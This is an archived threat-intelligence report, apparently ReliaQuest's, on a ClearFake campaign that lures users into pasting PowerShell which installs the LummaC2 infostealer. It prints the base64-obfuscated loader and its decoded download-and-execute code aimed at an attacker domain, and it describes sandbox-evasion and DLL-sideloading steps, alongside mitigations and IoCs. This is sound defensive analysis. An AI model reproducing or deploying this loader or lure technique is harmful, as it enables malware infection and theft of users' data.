{
	"id": "af8fc0e6-2093-47ef-9062-964059b40e03",
	"created_at": "2026-04-06T00:19:42.257358Z",
	"updated_at": "2026-04-10T03:20:32.637836Z",
	"deleted_at": null,
	"sha1_hash": "37f48cf0b9f3b5b1d703e9290050ef665b180ded",
	"title": "New Execution Technique in ClearFake Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 640877,
	"plain_text": "New Execution Technique in ClearFake Campaign\r\nBy ReliaQuest Threat Research Team 31 May 2024\r\nPublished: 2024-05-31 · Archived: 2026-04-05 14:05:26 UTC\r\nKey Points\r\nReliaQuest observed new execution techniques in a campaign from the JavaScript framework “ClearFake,”\r\ntricking users into copying, pasting, and manually executing malicious PowerShell code.\r\nUpon execution, the PowerShell code performs multiple functions, including clearing the DNS cache,\r\ndisplaying a message box, downloading further PowerShell code, and installing “LummaC2” malware.\r\nThis new execution technique of instructing users to manually execute malicious code can bypass existing\r\ntechnical controls and detections.\r\nTo protect against this developing threat, organizations should block indicators of compromise (IoCs) and\r\nlimit PowerShell to users who need it for their daily job functions. The attack relies on social engineering\r\ntechniques to obtain initial access; therefore, it is also important to educate users on the new methods being\r\nemployed by threat actors to trick them into downloading malware.\r\nIn May 2024, ReliaQuest discovered a campaign from the JavaScript framework “ClearFake” that uses new\r\nexecution techniques: The adversary tricks users into manually copying and executing malicious code in\r\nPowerShell. This differs from the typical drive-by downloads frequently observed with ClearFake and other “fake\r\nbrowser update”–associated distribution campaigns, in which the victim is tricked into downloading and executing\r\na malicious payload. This new technique is designed to evade detection by security tools, as it involves the user\r\nmanually running the malicious PowerShell commands directly, as opposed to being invoked by a script file\r\ndownloaded and executed by the user. 
The campaign then deploys a multi-stage malware infection using\r\nPowerShell and sandbox evasion techniques that leads to the installation of the LummaC2 infostealer malware.\r\nAs this campaign requires users to manually execute PowerShell code themselves, this technique will likely have\r\na lower chance of tricking users. However, it may result in more severe consequences, because successful\r\nexecution could result in detections and controls being bypassed. Security teams need to be aware of this new\r\nexecution technique, review current controls to restrict PowerShell use, and educate users to not copy and paste\r\ncode into the PowerShell or Windows Command Shell consoles.\r\nIn this report, we will break down the stages of this latest ClearFake campaign, delve into the use cases we\r\nobserved, and provide mitigations that organizations can implement to protect against this emerging threat.\r\nWhat Is ClearFake?\r\nhttps://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/\r\nPage 1 of 8\n\nClearFake is a JavaScript framework known to use drive-by downloads and social engineering techniques, often\r\npresenting fake “browser update” pages to users.\r\nThese attacks work by driving traffic to websites that mimic legitimate ones, then presenting users with a page\r\nclaiming that they need to perform a browser update to view the site’s content.\r\nThe goal is typically to get users to download malicious files, leading to data theft or deployment of further\r\nmalware.\r\nAttack Flow\r\nOn May 26, 2024, we first identified attacks on our customer base that began with users visiting a compromised\r\nwebsite hosting a fake browser error prompt that asks the user to install a root certificate to fix the issue. The\r\nwebsites we observed in these incidents belonged to legitimate businesses that were likely compromised through\r\nvulnerabilities allowing code to be injected. 
The error prompt instructs the user to manually execute malicious\r\nPowerShell code, which subsequently installs LummaC2 (see Figure 1).\r\nFigure 1: Attack flow\r\nAttack Analysis\r\nThe prompt on the compromised sites indicates that the content cannot be displayed properly and instructs users to\r\ninstall a “root certificate” to resolve the issue by clicking a “Fix it” button (see Figure 2).\r\nFigure 2: First fake update prompt\r\nAfter clicking “How to fix,” another prompt appears that contains instructions for installing the root certificate.\r\nThe message features a “copy” button that, when clicked, copies obfuscated malicious PowerShell code into the\r\nuser’s clipboard (see Figure 3). Next, the user is guided through several steps to open a PowerShell terminal and\r\npaste in the code, which then automatically executes.\r\nThis stage—tricking the user to run the malicious PowerShell manually—represents the noteworthy aspect of this\r\ncampaign. The method bypasses signatures and detections, including suspicious parent–child process\r\nrelationships, malicious file downloads, and Mark-of-the-Web signatures. The initial PowerShell execution runs\r\nunder explorer.exe with no parent process and without prior command lines.\r\nFigure 3: Second fake update prompt\r\nIn each instance, the PowerShell code copied by the user was obfuscated using base64 encoding. 
Decoding the\r\nbase64 reveals malicious PowerShell code:\r\nObfuscated PowerShell Code\r\nipconfig /flushdns\r\n$VBrowser = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String\r\n(“JGpvYiA9IFN0YXJ0LUpvYiAtU2NyaXB0QmxvY2sgewogICAgQWRkLVR5cGUgLUFzc2VtY\r\nmx5TmFtZSBTeXN0ZW0uV2luZG93cy5Gb3JtcwogICAgW1N5c3RlbS5XaW5kb3dzLkZvcm1z \r\nLk1lc3NhZ2VCb3hdOjpTaG93KCJUaGUgb3BlcmF0aW9uIGNvbXBsZXRlZCBzdWNjZXNzZn\r\nVsbHksIHBsZWFzZSByZWxvYWQgdGhlIHBhZ2UiLCAiU3lzdGVtIiwgMCwgNjQpCn0KCiRn\r\nOTFGID0gJ2h0dHBzOi8vcnRhdHRhY2suYmFxZWJlaTEub25saW5lL2RmL3R0JwokdjM4Sy\r\nA9IEB7ICdVc2VyLUFnZW50JyA9ICdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOy\r\nBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDa\r\nHJvbWUvMTAyLjAuMC4wIFNhZmFyaS81MzcuMzYnIH0KJHowNFEgPSBJbnZva2UtV2ViUm\r\nVxdWVzdCAtVXJpICRnOTFGIC1Vc2VCYXNpY1BhcnNpbmcgLUhlYWRlcnMgJHYzOEsKCklFW\r\nCAoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJHowNFEuQ29ud\r\nGVudCkpCgpjbGVhci1ob3N0Owo=”));\r\n$Update = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String\r\n(“U2V0LUNsaXBib2FyZCAtVmFsdWUgIiAiOw==”));\r\n$VER = $VBrowser + “; ” + $Update;\r\nInvoke-Expression $VER;\r\nexit;\r\nDecoded PowerShell Code\r\nipconfig /flushdns\r\n$VBrowser = $job = Start-Job -ScriptBlock {\r\nAdd-Type -AssemblyName System[dot]windows.Forms\r\n[System[dot]windows.Forms.MessageBox]::Show(“The operation completed successfully, please reload the\r\npage”, “System”, 0, 64)\r\n}\r\n$g91F = ‘hxxps://rtattack.baqebei1[dot]online/df/tt’\r\n$v38K = @{ ‘User-Agent’ = ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like\r\nGecko) Chrome/102.0.0.0 Safari/537.36’ }\r\n$z04Q = Invoke-WebRequest -Uri $g91F -UseBasicParsing -Headers $v38K\r\nIEX ([System.Text.Encoding]::UTF8.GetString($z04Q.Content))\r\nclear-host;\r\n$update = Set-Clipboard -Value ” 
“;\r\n$VER = $VBrowser + “; ” + $Update;\r\nInvoke-Expression $VER;\r\nWhen pasted into the PowerShell terminal, the code conducts the below execution:\r\n1. Executes “ipconfig /flushdns.” This is likely intended to clear the device DNS cache of the previously\r\nvisited infected site, which instructs the user to reload the webpage after executing the PowerShell.\r\n2. Starts a background job that uses the Windows .NET MessageBox Class to produce a message box stating:\r\n“The operation completed successfully, please reload the page.”\r\n3. Assigns the URL “hxxps://rtattack.baqebei1[dot]online/df/tt” to the variable “$g91F.”\r\n4. Assigns the user agent “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like\r\nGecko) Chrome/102.0.0.0 Safari/537.36” to the variable “$v38K.”\r\n5. Invokes a web request with the previously assigned URL and user agent and stores the response in\r\n“$z04Q.”\r\n6. Executes the retrieved content stored in the variable “$z04Q” with the “Invoke-Expression” (IEX)\r\ncommand.\r\n7. Clears the PowerShell screen.\r\n8. Clears the user’s clipboard.\r\n9. Combines the contents of the variables “$VBrowser” and “$Update” into “$VER,” which is then\r\nexecuted with Invoke-Expression to run the previous code.\r\nSandbox Evasion\r\nWhen the PowerShell script is executed, the attacker-controlled domain conducts a user agent check. If the correct\r\nuser agent is supplied, a second PowerShell script is downloaded. The PowerShell script checks the infected\r\ndevice’s CPU temperature, and, if the result is null, execution is terminated. The CPU temperature check is a form\r\nof sandbox evasion since virtual machines will not return a value. 
If a CPU temperature value is returned,\r\nexecution continues and a ZIP file is downloaded from the domain “cdnforfiles[.]xyz.” The ZIP file contains the\r\nlegitimate “MediaInfo.exe” file and the malicious DLL “MediaInfo_i386.dll.” The PowerShell script executes any\r\nfiles with a “.exe” extension, which subsequently executes MediaInfo.exe and the malicious DLL via DLL\r\nsideloading. Upon successful execution, LummaC2 is installed as an executable file.\r\nCase Studies\r\nIn this section, we explore two case studies ReliaQuest observed as part of the new ClearFake campaign.\r\nCase Study 1\r\nA user visited an infected website that referenced the attacker-controlled domain “d1x9q8w2e4[.]xyz” to produce\r\nthe fake update prompt. The user copied the malicious PowerShell code into the PowerShell console and executed\r\nit. The second stage download attempt was blocked by technical controls, preventing any traffic to the second\r\ndomain “rtattack.baqebei1[dot]online,” thereby preventing further infection.\r\nReliaQuest detected the download attempt and proactively blocked the hash value of the next PowerShell file\r\nintended for download. The organization permits PowerShell execution on the user’s host, enabling the user to\r\ncopy, paste, and execute the malicious code. Technical controls stopped the second download stage; however,\r\nfurther restricting the use of PowerShell and making the user aware of the threat could have prevented initial\r\nexecution.\r\nCase Study 2\r\nA user visited an infected website referencing the attacker-controlled domain “dnforfiles[.]xyz” to inject the\r\nupdate prompt. The user followed the instructions to copy and paste the malicious PowerShell code into a console.\r\nThe following infection chain occurred successfully:\r\n1. 
The PowerShell execution was successful, and the infected device contacted the domain\r\n“rtattack.baqebei1[.]online/df/tt” to download the next PowerShell file.\r\n2. The second PowerShell file executed successfully and downloaded the ZIP file “data.zip” to the path\r\n“C:\\Users\u003cusername\u003e\\AppData\\Local\\Temp\\data.zip.” The ZIP file “data.zip” contains the files\r\n“billhead.ai,” “MediaInfo.exe,” and “MediaInfo_i386.dll”.\r\n3. The PowerShell script then extracts the ZIP file contents and executes any files with the “.exe” extension.\r\nThis runs the legitimate “MediaInfo.exe” program and the malicious DLL “MediaInfo_i386.dll,” which\r\ninstalled LummaC2.\r\nReliaQuest detected the LummaC2 malware and performed triage of the incident. The ReliaQuest technical\r\noperations team used GreyMatter Respond to ban the hash values of the malicious files and block the attacker-controlled domains and IP addresses. We recommended the organization perform a full wipe and re-image of the\r\ninfected host from a known good backup to remove any persistence gained by the malware and change the\r\nimpacted user’s credentials as a precaution. This case study provides further evidence of the importance of\r\nrestricting users from executing applications such as PowerShell and limiting PowerShell execution to cases where it is\r\nnecessary. 
If implemented, network controls blocking connections to the anomalous top-level domain “.xyz” could have\r\nprevented further infection.\r\nWhat ReliaQuest Is Doing\r\nTo identify malicious activity associated with ClearFake, ReliaQuest offers detection rules to customers.\r\nAssociated GreyMatter Respond Plays can be executed to perform remediation by ReliaQuest customers or on\r\ntheir behalf by the ReliaQuest team.\r\nRecommendations and Best Practices\r\nIn addition to the detection rules cited above, we offer the following general recommendations and best practices\r\nto protect against the campaign detailed in this report.\r\nDeploy application control policies to restrict the execution of PowerShell scripts to only those users who\r\nneed it for their job functions.\r\nEnhance user awareness by notifying users, IT personnel, and security teams about this ongoing campaign.\r\nRemind users of the threats of copying and executing code from untrusted sources.\r\nRegularly update and patch websites and third-party tools used in sites to prevent exploitation of\r\nvulnerabilities that could allow code injection and unauthorized script execution.\r\nImplement policies on network proxy devices to block access to newly registered domains, especially those\r\nwith suspicious top-level domains (TLDs) such as .xyz, which are often used by threat actors to distribute\r\nmalicious content.\r\nSet Windows Defender Application Control (WDAC) to the most restrictive level possible. WDAC forces\r\nPowerShell to run in constrained language mode, which restricts PowerShell functions commonly abused\r\nby malware.\r\nVerify that deployed endpoint detection and antimalware security tools are integrated with the Windows\r\nAntimalware Scan Interface (AMSI). 
AMSI intercepts script commands, including PowerShell, before\r\nexecution and uses antivirus software to analyze the commands.\r\nEnsure PowerShell execution policies are not set to unrestricted or undefined to prevent the execution of\r\nmalicious scripts.\r\nIndicators of Compromise\r\nThe below IoCs have been proactively added to the GreyMatter Intel feed for ReliaQuest customers.\r\nAttacker-Controlled Domains\r\nbaqebei1[.]online\r\ncdnforfiles[.]xyz\r\nd1x9q8w2e4[.]xyz\r\nAttacker-Controlled IP Addresses\r\n104[.]21[.]29[.]92\r\n172[.]67[.]148[.]183\r\n188[.]114[.]97[.]7\r\nSource: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/"
	],
	"report_names": [
		"new-execution-technique-in-clearfake-campaign"
	],
	"threat_actors": [],
	"ts_created_at": 1775434782,
	"ts_updated_at": 1775791232,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/37f48cf0b9f3b5b1d703e9290050ef665b180ded.pdf",
		"text": "https://archive.orkl.eu/37f48cf0b9f3b5b1d703e9290050ef665b180ded.txt",
		"img": "https://archive.orkl.eu/37f48cf0b9f3b5b1d703e9290050ef665b180ded.jpg"
	}
}